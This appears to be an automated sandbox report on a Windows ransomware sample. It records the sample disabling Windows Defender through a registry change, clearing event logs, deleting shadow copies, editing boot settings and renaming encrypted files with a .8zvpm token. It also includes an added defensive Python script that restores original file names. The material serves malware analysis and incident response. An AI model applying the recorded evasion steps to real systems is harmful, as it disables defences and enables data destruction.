memory/2136-132-0x0000000002802000-0x0000000002804000-memory.dmp

memory/2136-131-0x0000000002800000-0x0000000002802000-memory.dmp

memory/2136-134-0x000000000280B000-0x000000000282A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 19:26

Reported

2022-01-12 19:31

Platform

win10-en-20211208

Max time kernel

186s

Max time network

224s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\CompareSkip.tif => C:\Users\Admin\Pictures\CompareSkip.tif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y3FMCwdwYPg0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\MoveComplete.png => C:\Users\Admin\Pictures\MoveComplete.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mjJ5vmBhLmg0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\RegisterUnlock.png => C:\Users\Admin\Pictures\RegisterUnlock.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_g4LpNxXGly00.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\RegisterUnlock.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_g4LpNxXGly00.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\WaitOut.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_WbaKp_VMsOs0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\DenyRename.crw => C:\Users\Admin\Pictures\DenyRename.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mmup_e1pz7A0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\DenyRename.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mmup_e1pz7A0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\OpenCompress.tiff => C:\Users\Admin\Pictures\OpenCompress.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_7hO2a7hMKL80.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\SubmitOpen.png => C:\Users\Admin\Pictures\SubmitOpen.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_zJEq2wjIOyY0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\WaitOut.crw => C:\Users\Admin\Pictures\WaitOut.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_WbaKp_VMsOs0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompareSkip.tif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y3FMCwdwYPg0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\MoveComplete.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mjJ5vmBhLmg0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\OpenCompress.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_7hO2a7hMKL80.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\RevokeRestore.tiff => C:\Users\Admin\Pictures\RevokeRestore.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Ael394oL5ZY0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\RevokeRestore.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Ael394oL5ZY0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\SubmitOpen.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_zJEq2wjIOyY0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
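
Every rename in the table keeps the original file name in full and appends a 56-character base64url token followed by the .8zvpm extension; the first 44 characters of the token are identical for every file in this run and the last 12 differ per file. The following Python is an added example, not the report's or the malware's code: it parses that pattern to restore original paths from an encrypted-file listing, computes the run-wide marker instead of hard-coding it, and separates files renamed by this pattern from paths that appear in the tables only as "opened for modification". The sample paths are copied from this report; what the token's 42 decoded bytes encode is not established by the report and is not asserted here.

```python
"""Recover original paths from the rename pattern recorded in this report."""
import base64
import ntpath
import re

# Observed in the "File renamed" rows above: <original name>.<56 base64url chars>.8zvpm
ENCRYPTED_NAME = re.compile(r'^(?P<original>.+)\.(?P<token>[A-Za-z0-9_-]{56})\.8zvpm$')

# Constructed listing: paths copied from this report's tables. The last one was only
# "opened for modification" and carries no token, so it must not be reported as renamed.
SAMPLE_PATHS = [
    r'C:\Users\Admin\Pictures\CompareSkip.tif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y3FMCwdwYPg0.8zvpm',
    r'C:\Users\Admin\Pictures\WaitOut.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_WbaKp_VMsOs0.8zvpm',
    r'C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\msdaorar.dll.mui.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_ro-bXZoO6bQ0.8zvpm',
    r'C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\wfh.png',
]


def parse_encrypted_name(path):
    """Return {'dir', 'original', 'token'} for a path renamed by this pattern, else None.
    ntpath is used so Windows paths split correctly on any analysis host."""
    directory, name = ntpath.split(path)
    m = ENCRYPTED_NAME.match(name)
    if m is None:
        return None
    return {"dir": directory, "original": m.group("original"), "token": m.group("token")}


def token_bytes(token):
    """base64url-decode the token: 56 characters always decode to exactly 42 bytes.
    What those bytes encode is not established by this report and is not asserted here."""
    return base64.urlsafe_b64decode(token)


def shared_marker(tokens):
    """Longest common prefix of all tokens: the part constant across one run of the
    sample, computed rather than hard-coded so the function also works on another run."""
    tokens = list(tokens)
    if not tokens:
        return ""
    prefix = tokens[0]
    for t in tokens[1:]:
        while not t.startswith(prefix):
            prefix = prefix[:-1]
    return prefix


def inventory(paths):
    """Split a listing into files renamed by this pattern (original path restored)
    and paths that do not carry the token."""
    renamed, untouched = [], []
    for path in paths:
        parsed = parse_encrypted_name(path)
        if parsed is None:
            untouched.append(path)
            continue
        parsed["original_path"] = ntpath.join(parsed["dir"], parsed["original"])
        renamed.append(parsed)
    return renamed, untouched


if __name__ == "__main__":
    renamed, untouched = inventory(SAMPLE_PATHS)
    print("run marker:", shared_marker(p["token"] for p in renamed))
    for p in renamed:
        print(p["original_path"], "<-", p["token"][-12:])
    for path in untouched:
        print("no rename token:", path)
```

Restoring the original name is only a naming step; the content stays encrypted. The value of the parser during response is scoping: it turns a raw file listing into the set of files this run touched, and the shared marker lets two hosts hit by the same run be tied together by file names alone, without needing the sample.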

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\plugin.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_obhWKhFTuLo0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_RDhSc56wBVE0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupMedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\wfh.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\LargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\msdaorar.dll.mui.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_ro-bXZoO6bQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_KMS_Client-ul.xrm-ms.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_BRdfIGodR2g0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_13s.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\cc_16x11.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up.gif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_wlYSDYHTp-00.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\cursors.properties.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_SuH2a19fxdY0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_iBfE7dIDHt40.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-16_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\176.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\cardsLoadingSequence.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6918_40x40x32.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_0iYS1xh8QEk0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_yARMXAq_nvc0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\ja-JP\msader15.dll.mui C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_QnDoyUOAMTA0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\af_60x42.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\iheart-radio.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Show.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-black\MedTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb_new.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_OrsbQ7oYGzw0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_UdsIOjMaAKM0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTrial-pl.xrm-ms.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_R5jg0NSrpA00.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\WideLogo.scale-125.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\OneConnectBadgeLogo.scale-100.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-focus_32.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_ZAIAIMcrQys0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\Animation\unlocking-animation-187x169.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_empty_state.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_28CaMP9IMzM0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_1OW5KVgw_M80.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y2Y2zzxCJBs0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_j5SVvt6PHv40.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\177.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-36_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_bO-IqtT12240.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Lumia.ViewerPlugin\Assets\IconEditRichCapture.scale-100.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\PeopleWideTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeLargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_XabFKKF90ys0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Voices\beeps\uncommon.lua C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\Snooze.scale-80.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_wt0cMuQ9gKk0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubAppList.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\SharpDXEngine\Rendering\Shaders\Builtin\HLSL\TexturedColored.fx C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\6536_32x32x32.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\MedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-36_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_IaofxGLGhGc0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_w_55QkPBUmk0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
